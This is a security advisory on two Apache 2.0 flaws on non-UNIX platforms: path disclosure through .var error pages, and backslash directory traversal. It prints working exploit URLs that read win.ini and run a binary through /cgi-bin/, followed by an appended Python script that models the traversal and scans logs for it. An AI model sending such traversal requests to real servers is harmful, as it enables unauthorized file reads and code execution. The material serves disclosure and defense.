The Apache HTTP Server 2.0 on non-UNIX platforms (Windows, NetWare and OS/2) has been found to contain two security vulnerabilities: a directory traversal vulnerability and a path disclosure vulnerability. The first allows an attacker to read any file on the file system and, by prefixing the path with /cgi-bin/, to execute it. The second is a simple path disclosure bug, useful for gathering more information about the server (important where the administrator has tried to hide such details).

Credit:
The information has been provided by Auriemma Luigi of PivX Solutions.
Vulnerable systems:
* Apache web server version 2.0.39 and earlier 2.0.x releases (Windows/NetWare/OS/2)
Immune systems:
* Apache web server (UNIX)
* Apache web server version 2.0.40 (Windows/NetWare/OS/2)
Path disclosure:
This vulnerability is not dangerous by itself, since it gives neither remote access to the system nor access to other data, but it lets an attacker gather detailed information about the server (here the installation path) that is useful when preparing further attacks.
Example:
From a browser, request the following URL:
http://127.0.0.1/error/HTTP_NOT_FOUND.html.var
The server answers with this page:
|Not Acceptable
|
|An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server.
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr
As you can see, the server answers with the full filesystem path of the file we requested. Requesting any of the other .var files in the error folder gives the same result.
Additional information can be found on the Apache website.
Directory traversal:
The problem lies in the filtering of bad characters sent by the user. In this case the backslash character ('\' == %5c) is not filtered out, so a path such as \..\ is passed through to the Windows filesystem, which treats '\' as a directory separator, allowing us to reach directories outside the directory the request is normally confined to.
The vulnerability is made more severe by the fact that, by prefixing the traversal path with /cgi-bin/, we can cause the server to execute the file we are requesting rather than return it.
Examples:
The following are two simple examples:
The following will view the file winnt\win.ini:
http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
The following will execute the "wintty" utility found in the Apache2/bin folder (it is not in cgi-bin, which is what makes this a traversal):
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
The same two requests with the percent-encoding decoded:
http://127.0.0.1/error/\..\..\..\..\winnt\win.ini
http://127.0.0.1/cgi-bin/\..\bin\wintty.exe?-t+HELLO
Fix:
Upgrade to Apache 2.0.40, available from the Apache website: http://httpd.apache.org
Workaround:
The Apache Group suggests the following simple workaround for the directory traversal bug (it does not address the path disclosure):
A one-line addition to httpd.conf disallows the vulnerable requests. Prior to the first 'Alias' or 'Redirect' directive, add the following directive to the global server configuration:
RedirectMatch 400 "\\\.\."
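
The following Python script is an added example and is not part of this advisory or of Apache's own code. It covers the directory traversal examples above and the RedirectMatch workaround: it maps the two encoded requests to filesystem paths the way the vulnerable Windows server effectively did, shows why the usual forward-slash form of the same traversal is harmless, flags both the traversal and the .var path disclosure pattern in access-log lines, and checks which requests the workaround would answer with 400. The Apache2 install path comes from the path-disclosure output above; the DocumentRoot location, the alias table, the log lines and the emulation of the RedirectMatch pattern as the regex \\\.\. (a literal backslash followed by two dots, without reproducing httpd's own config-string unescaping) are assumptions made for the example.

```python
# Added example; not code from the advisory or from the Apache project.
import posixpath
import re
from urllib.parse import unquote

SERVER_ROOT = "C:/server/Apache Group/Apache2"   # from the .var disclosure above
DOCROOT = SERVER_ROOT + "/htdocs"                # assumed DocumentRoot
ALIASES = {                                      # assumed default 2.0 aliases
    "/error/": SERVER_ROOT + "/error/",
    "/cgi-bin/": SERVER_ROOT + "/cgi-bin/",
}


def _map(request_target):
    """Return (resolved file, directory the URL prefix maps to).

    Models the vulnerable behaviour: the URL path is percent-decoded and
    '/..' segments are collapsed (which the server did), but '\\..' is left
    alone, so when the path reaches the Windows filesystem, which accepts
    '\\' as a separator, the '..' climbs out of the aliased directory.
    """
    url_path = unquote(request_target.split("?", 1)[0])
    url_path = posixpath.normpath(url_path)      # collapses '/../', not '\..'
    for prefix, directory in ALIASES.items():
        if url_path.startswith(prefix):
            base, rest = directory, url_path[len(prefix):]
            break
    else:
        base, rest = DOCROOT + "/", url_path.lstrip("/")
    # The OS treats '\' like '/'; normalising the joined path shows the result.
    resolved = posixpath.normpath((base + rest).replace("\\", "/"))
    return resolved, posixpath.normpath(base)


def resolve_windows(request_target):
    """Filesystem path the request ends up at on the vulnerable server."""
    return _map(request_target)[0]


def escapes_mapped_dir(request_target):
    """True when the request resolves outside the directory its prefix maps to."""
    resolved, base = _map(request_target)
    return not resolved.startswith(base + "/")


# httpd.conf:  RedirectMatch 400 "\\\.\."
# Emulated as: a literal backslash followed by two dots, applied to the
# decoded URL path (assumption: mod_alias matches after percent-decoding).
WORKAROUND = re.compile(r"\\\.\.")


def workaround_blocks(request_target):
    """Would the RedirectMatch workaround answer this request with 400?"""
    path = unquote(request_target.split("?", 1)[0])
    return WORKAROUND.search(path) is not None


# Constructed Common Log Format lines; the attack requests are the two above.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Aug/2002:10:01:02 +0200] "GET /index.html HTTP/1.1" 200 1043',
    '10.0.0.9 - - [17/Aug/2002:10:01:07 +0200] "GET /error/HTTP_NOT_FOUND.html.var HTTP/1.1" 406 1020',
    '10.0.0.9 - - [17/Aug/2002:10:01:15 +0200] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1" 200 421',
    '10.0.0.9 - - [17/Aug/2002:10:01:20 +0200] "GET /cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO HTTP/1.1" 200 88',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_log(lines):
    """Return (kind, request-target) for every line matching either pattern."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        decoded = unquote(target.split("?", 1)[0])   # decode before matching
        if "\\.." in decoded:
            findings.append(("traversal", target))
        elif decoded.lower().endswith(".var"):
            findings.append(("path-disclosure", target))
    return findings


if __name__ == "__main__":
    for kind, target in scan_log(SAMPLE_LOG):
        print(kind, target, "->", resolve_windows(target),
              "blocked by workaround:", workaround_blocks(target))
```

Run it as-is to see where each logged request lands and which of them the workaround stops; the .var request is reported by the scanner but, as noted above, is not blocked by the RedirectMatch line.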